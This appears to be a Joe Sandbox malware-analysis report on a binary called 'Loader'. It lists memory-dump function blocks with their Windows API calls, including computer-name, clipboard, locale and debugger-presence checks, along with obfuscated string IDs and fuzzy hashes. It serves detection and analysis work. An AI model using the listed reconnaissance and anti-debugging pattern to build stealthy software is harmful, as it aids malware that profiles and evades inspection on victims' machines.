                                                                                                                • Instruction Fuzzy Hash: 50113435214B818BD720CB75DC14BA7BBE5EF46310F19882ED5DAC7391CB38A802CB28
                                                                                                                APIs
                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CD8A
                                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CDA2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeSecurity
                                                                                                                • String ID:
                                                                                                                • API String ID: 640775948-0
                                                                                                                • Opcode ID: 8e4b465f0e696d12a0cc1979272a33652f63729dff8492a5ee6ac831f02b0d9b
                                                                                                                • Instruction ID: 30e1982d8f4e2053215f1ca3b668570085850ca10af8fc8413d65f00a9a88e9b
                                                                                                                • Opcode Fuzzy Hash: 8e4b465f0e696d12a0cc1979272a33652f63729dff8492a5ee6ac831f02b0d9b
                                                                                                                • Instruction Fuzzy Hash: FAF0A5767C5310B7F67C07249D6BF1925125BC1F24F3A4329B7263E6E0C9E42501468C
                                                                                                                APIs
                                                                                                                • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042B4C9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ComputerName
                                                                                                                • String ID:
                                                                                                                • API String ID: 3545744682-0
                                                                                                                • Opcode ID: 1c116944cb6288f7f3023eb83410161bab3497c6809ee9447dc1a6d79191d705
                                                                                                                • Instruction ID: 409c405d53bf95258bea6c82a37deeba6769f396c72862485e716adcf633dd66
                                                                                                                • Opcode Fuzzy Hash: 1c116944cb6288f7f3023eb83410161bab3497c6809ee9447dc1a6d79191d705
                                                                                                                • Instruction Fuzzy Hash: 5B2192352047518BD719CF25D8A0672BBE2FF97304B19859EC0D78B752CB38A846CB55
                                                                                                                APIs
                                                                                                                • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0042B4C9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ComputerName
                                                                                                                • String ID:
                                                                                                                • API String ID: 3545744682-0
                                                                                                                • Opcode ID: 9c9166169faba489429aefb980ee5394d871875fd777178d088499351131be3c
                                                                                                                • Instruction ID: 6a7d8507080d5458e55a58bacb6976a464bfc74b10077fff0acaf8e9814da14c
                                                                                                                • Opcode Fuzzy Hash: 9c9166169faba489429aefb980ee5394d871875fd777178d088499351131be3c
                                                                                                                • Instruction Fuzzy Hash: 6621A2352047418BC719CF35D8A0663B7A2FF9A300B19859DC0D78B752CB38A886CB51
                                                                                                                APIs
                                                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0042B3B7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ComputerName
                                                                                                                • String ID:
                                                                                                                • API String ID: 3545744682-0
                                                                                                                • Opcode ID: 745983e085da360698a1f76826e1debb89df562ed689eaa029085fb38e2de1a3
                                                                                                                • Instruction ID: 9d008ff02a4c2f1a96795975a1cf28f9f75e56796dc4922f000902c1bda0b622
                                                                                                                • Opcode Fuzzy Hash: 745983e085da360698a1f76826e1debb89df562ed689eaa029085fb38e2de1a3
                                                                                                                • Instruction Fuzzy Hash: 4F113831214B818BD720CB35D8107A7BBD1EF46310F59842ED5DAC7351CB399406CB24
                                                                                                                APIs
                                                                                                                • GetUserDefaultUILanguage.KERNELBASE ref: 00436135
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DefaultLanguageUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 95929093-0
                                                                                                                • Opcode ID: d897c574f32a5ba550f79b63f3b0d0cf438ad50a3d39c2dc108cdb5bcdd6240d
                                                                                                                • Instruction ID: f851d370d7e644f22e4a4b53e5f370e2c4d05da048dcdf518086029b30789e5f
                                                                                                                • Opcode Fuzzy Hash: d897c574f32a5ba550f79b63f3b0d0cf438ad50a3d39c2dc108cdb5bcdd6240d
                                                                                                                • Instruction Fuzzy Hash: 8C21E772D052A8CFDB248F789C853DD7BB15F59320F1A42AEC849BB386CA784D418F51
                                                                                                                APIs
                                                                                                                • RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B67D,00000000,00000000), ref: 0043C652
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: 65c52e7afab2ea9895ec623c07326861ba393e72b4bd7239f98d72508dbbccd2
                                                                                                                • Instruction ID: 3d4c23eb339db9dfa9da3606a127b5149aff1c7c6ec0ac71df25786042906406
                                                                                                                • Opcode Fuzzy Hash: 65c52e7afab2ea9895ec623c07326861ba393e72b4bd7239f98d72508dbbccd2
                                                                                                                • Instruction Fuzzy Hash: 87E09B76554611ABC6102F357C16F1B3664DFCF714F162C3AF44067111DA39E81186AF
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BlanketProxy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3890896728-0
                                                                                                                • Opcode ID: 438a52a7958d470ff716d772127d33d5a979f60480b183ba2e146c4ce516e4f2
                                                                                                                • Instruction ID: ec106bfa154cd3a6e2363df0bba870ff3029a76047e972c821c17a1dc406a7a9
                                                                                                                • Opcode Fuzzy Hash: 438a52a7958d470ff716d772127d33d5a979f60480b183ba2e146c4ce516e4f2
                                                                                                                • Instruction Fuzzy Hash: E501FFB46087018FD304DF24C594B5A7BF1FB85308F11885DE1958B394C7B5A949CF81
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BlanketProxy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3890896728-0
                                                                                                                • Opcode ID: 0eca9bbcc6a27c0ef14d982516248d3be7fa97c1cd161aeb6cb31cc2bc0333a4
                                                                                                                • Instruction ID: 99e05297ac493cd784d781e0af23b182a259bd718048770fef0d435df22bd7d7
                                                                                                                • Opcode Fuzzy Hash: 0eca9bbcc6a27c0ef14d982516248d3be7fa97c1cd161aeb6cb31cc2bc0333a4
                                                                                                                • Instruction Fuzzy Hash: 79F092B45093428FE324DF29C5A8B5EBBF0BB88304F00891CE4998B290C7B595098F82
                                                                                                                APIs
                                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CD43
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2538663250-0
                                                                                                                • Opcode ID: 89b421da4be621a6f53322ceb903cb81620c8d2bdd6469584064898a13de0a30
                                                                                                                • Instruction ID: 623e5ea4ddc3d9043fec7026d24f58760a742289b41f13a79f83a96a0a9a4a35
                                                                                                                • Opcode Fuzzy Hash: 89b421da4be621a6f53322ceb903cb81620c8d2bdd6469584064898a13de0a30
                                                                                                                • Instruction Fuzzy Hash: 45D0A7346501447BD214671DED47F56365C9387759F440235B362CB2D6DD506810C579
                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(?,00000000), ref: 0043AC4D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: 8846ced3079f5c18de75f6d9ce761765aa9f5eca5e511fa2a96ff5aa44dc1cd4
                                                                                                                • Instruction ID: 012f71a3a032f5abcc96f8c740cddb013d2357ba26b15dcfa30ad5ae7aab7874
                                                                                                                • Opcode Fuzzy Hash: 8846ced3079f5c18de75f6d9ce761765aa9f5eca5e511fa2a96ff5aa44dc1cd4
                                                                                                                • Instruction Fuzzy Hash: 5BC08031404522FBC6503F157C057DE3610EF05311F070861F00058075D725CC61C5D8
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(?,00000000,7E794FF3,?,00408859,7E794FF3), ref: 0043AC10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: 9cef1cbe651b0ed60b34efb379772da6adee9ab1ab503a86b321aabc44a7781a
                                                                                                                • Instruction ID: 1862c9cd68e344d40816c81f1b6b688736f6379114b4badfac60c21a762842ed
                                                                                                                • Opcode Fuzzy Hash: 9cef1cbe651b0ed60b34efb379772da6adee9ab1ab503a86b321aabc44a7781a
                                                                                                                • Instruction Fuzzy Hash: D5C09B31445221ABC6503B15FC05FCA3F58DF49361F150455F00467072C761AC91C6D8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: !>K$&>K$7@6F$A$F$F}^6$Kv$P)46$P)46$g$q*P$BC@$cA
                                                                                                                • API String ID: 0-1404199487
                                                                                                                • Opcode ID: bc2e1ec545659b611d5e768b705fef94ce5ecebba7b34cf5504dce908e6b6d7f
                                                                                                                • Instruction ID: 9b2308db071d4e055e69daabddb361a0688e1a71d139ce48a86b06fcd2de6d53
                                                                                                                • Opcode Fuzzy Hash: bc2e1ec545659b611d5e768b705fef94ce5ecebba7b34cf5504dce908e6b6d7f
                                                                                                                • Instruction Fuzzy Hash: 487247726083518BC724CF28C8917ABB7E1EFD5314F1A896DE8C99B3A1D738D841CB56
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0D2J$0H:N$5|6r$67$9L)R$:x3~$;:98$;:98$;E$Q_$SP$U,W"$_0x6$`4~*$k>[<$o$rs$s u&$v$rZ$~(n.$3=$_Y$
                                                                                                                • API String ID: 0-471170200
                                                                                                                • Opcode ID: 49785c331e303325c2d5f1130fe28a7cdd9916a9b95d97a78b9ec09e7f27b649
                                                                                                                • Instruction ID: ff6f4c789d5a6e4588788ded0b6cc1fb0d5ad504678d0f77139615620280fa2d
                                                                                                                • Opcode Fuzzy Hash: 49785c331e303325c2d5f1130fe28a7cdd9916a9b95d97a78b9ec09e7f27b649
                                                                                                                • Instruction Fuzzy Hash: F4A292B560C3918BC334CF64D8417AFBBF2EBD2304F44892DD4999B261D77999068B8B
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard$CloseDataOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2058664381-0
                                                                                                                • Opcode ID: 1edbc63d022be973e181bcc4bcc2c77a4c0be4f208b51d4151ab8a42b88737a9
                                                                                                                • Instruction ID: 8359400020177de919e97fd6decbb339d076148ace7eba0a29addb768ac27250
                                                                                                                • Opcode Fuzzy Hash: 1edbc63d022be973e181bcc4bcc2c77a4c0be4f208b51d4151ab8a42b88737a9
                                                                                                                • Instruction Fuzzy Hash: A641F1B08087828FD701AF78D5493AEBFA0AB06304F04863ED49597791D3799959C7A7
                                                                                                                APIs
                                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,00CDAB6D,00000002,00000000,?,?,?,00CDAB6D,?,00000000), ref: 00CDB250
                                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,00CDAB6D,00000002,00000000,?,?,?,00CDAB6D,?,00000000), ref: 00CDB279
                                                                                                                • GetACP.KERNEL32(?,?,00CDAB6D,?,00000000), ref: 00CDB28E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoLocale
                                                                                                                • String ID: ACP$OCP
                                                                                                                • API String ID: 2299586839-711371036
                                                                                                                • Opcode ID: dd29c6e02400997879cbc736c3e00cdfd5391a457f83710846e7202b044d1160
                                                                                                                • Instruction ID: 7b4f75154e5650e4de5f2aa340222c764dfda8cd670a65059e55a72b52addca5
                                                                                                                • Opcode Fuzzy Hash: dd29c6e02400997879cbc736c3e00cdfd5391a457f83710846e7202b044d1160
                                                                                                                • Instruction Fuzzy Hash: 4E21AF63A00101EADB348F69C941B9F73A6AF54F60B57842AEA2ADB314E732DF40C350
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: s%}$&Z&X$(R)P$(w/q$0nl$=V+T
                                                                                                                • API String ID: 0-1387839616
                                                                                                                • Opcode ID: c747c06ce6a634ceac96083f3f5c235a32ad4c6b75348b3fa91c2a960a1c18ce
                                                                                                                • Instruction ID: 7cc081393892e2bb81599d43f4e62f865ac533fb992447ade34df63e85d6afdd
                                                                                                                • Opcode Fuzzy Hash: c747c06ce6a634ceac96083f3f5c235a32ad4c6b75348b3fa91c2a960a1c18ce
                                                                                                                • Instruction Fuzzy Hash: C0D116B26043108BD724CF25D8527ABB7F2FFD1314F18896DE4958B3A1E7798845C786
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 503360CAB129FD4CDB71E32F12885CB3$IIMC$IIMC$X+\?$sm$~u
                                                                                                                • API String ID: 0-4040820192
                                                                                                                • Opcode ID: 98299133eb32eaaa475b98df3f74112f0f3d5447a2ca98cf74f5130eeb0459c5
                                                                                                                • Instruction ID: 2f09004ba503a68494627b5ecf3dbf59a07ec3df9fe6c065a8492fe87d6ce8be
                                                                                                                • Opcode Fuzzy Hash: 98299133eb32eaaa475b98df3f74112f0f3d5447a2ca98cf74f5130eeb0459c5
                                                                                                                • Instruction Fuzzy Hash: B5B1F2706083808BD718DF3588916AFBBE1EFD2314F144A6DF5E19B392D778890ACB56
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
                                                                                                                  • Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0
                                                                                                                • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00CDAB3F
                                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 00CDAB7D
                                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 00CDAB90
                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00CDABD8
                                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00CDABF3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 415426439-0
                                                                                                                • Opcode ID: fda1c56f1a7f0c9a63ced4dbe06ff53259948b65b3476b7f42a18d2d6ce3b337
                                                                                                                • Instruction ID: 0bc2ae38e98a575a0ddf227704418bfcae0cfc189d0bc7a660b65386a9369dc8
                                                                                                                • Opcode Fuzzy Hash: fda1c56f1a7f0c9a63ced4dbe06ff53259948b65b3476b7f42a18d2d6ce3b337
                                                                                                                • Instruction Fuzzy Hash: D3518271A00205AFDF20DFA5CC85BBE73B9EF44710F04456BEA14EB291E7719A41DB62
                                                                                                                APIs
                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?), ref: 00426F9B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                • String ID: @mB$AuB$KJIH
                                                                                                                • API String ID: 237503144-3501611786
                                                                                                                • Opcode ID: ab3f4315a23d5c9ae3ee0830ec8f5c28eb5824a3093ec2abad75e7fe3ec17df4
                                                                                                                • Instruction ID: d262133a3be5540d0118b197f08afeb0b7c8be6a9deb4b7d3c14bb8b7fef4ca8
                                                                                                                • Opcode Fuzzy Hash: ab3f4315a23d5c9ae3ee0830ec8f5c28eb5824a3093ec2abad75e7fe3ec17df4
                                                                                                                • Instruction Fuzzy Hash: 3571EEB5A08310DFD3148F25E84171BB7E1EBCA314F05896EF985A73A1D738E801CB9A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: 6$;:98$;:98$;:98$;:98
                                                                                                                • API String ID: 2994545307-3965596542
                                                                                                                • Opcode ID: 24de79856df6bd49acb4c994e07c03ab278b176e28e66f8f556a4f0e8c0f423f
                                                                                                                • Instruction ID: 9ea0004e4662c6dacb3168d02cb1b15c360314975831602f1397047ae4578862
                                                                                                                • Opcode Fuzzy Hash: 24de79856df6bd49acb4c994e07c03ab278b176e28e66f8f556a4f0e8c0f423f
                                                                                                                • Instruction Fuzzy Hash: 57F14C7560C3408BD7248F24D8926BBB7E2EB87314F255A2DD48263352D739DC878B9E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: [Z$[Z$mZ$mZ${IKu
                                                                                                                • API String ID: 0-1401884219
                                                                                                                • Opcode ID: 606c2bcfcb5eae1da5b2f0c97e8f05bca2f2f94ae4942d599497e84f1e03380b
                                                                                                                • Instruction ID: 8bd9f270d81d9291231bb75fbec219a0c78526c0c8645d91fa1bb5ce8a86b988
                                                                                                                • Opcode Fuzzy Hash: 606c2bcfcb5eae1da5b2f0c97e8f05bca2f2f94ae4942d599497e84f1e03380b
                                                                                                                • Instruction Fuzzy Hash: 5E811661704F418BD729CE2AC491377BBE29F9A301B5889AEC0D787B56DB3CE8068754
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_400000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ;:98$OGO@$pvxO$t_$wOGH
                                                                                                                • API String ID: 0-2832874370
                                                                                                                • Opcode ID: 32d37d2d8af7b6dc103b6a5232507635f2f3c4c0de0d09c58c499025a54c7502
                                                                                                                • Instruction ID: c170b910105fcf85f83f3db7783d2ab6abd74a21b28db397255ddb642b7adcbd
                                                                                                                • Opcode Fuzzy Hash: 32d37d2d8af7b6dc103b6a5232507635f2f3c4c0de0d09c58c499025a54c7502
                                                                                                                • Instruction Fuzzy Hash: E04126B4409780DBE7309F24D846BEF77E0AF82304F154A3DE48997262DB395856CB6B
                                                                                                                APIs
                                                                                                                • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CDB889
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102407288.0000000000CF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102437837.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102468506.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFindFirst
                                                                                                                • String ID:
                                                                                                                • API String ID: 1974802433-0
                                                                                                                • Opcode ID: c1721d987ce24d03f7da6d62f5066f662c7864b5e8877bbe9a15a11670121128
                                                                                                                • Instruction ID: 6940fa6ab960147cafb6a810149827cc87c7d371fbf121564f9f8a38725a8ea8
                                                                                                                • Opcode Fuzzy Hash: c1721d987ce24d03f7da6d62f5066f662c7864b5e8877bbe9a15a11670121128
                                                                                                                • Instruction Fuzzy Hash: EE71C071D051699FDF20AF288C99ABEB7B8AF05300F1541DBE61DA7351EB318E85AF10
                                                                                                                APIs
                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00CC9A7F
                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00CC9B4B
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CC9B64
                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00CC9B6E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.96102321568.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.96102290730.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.96102373216.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
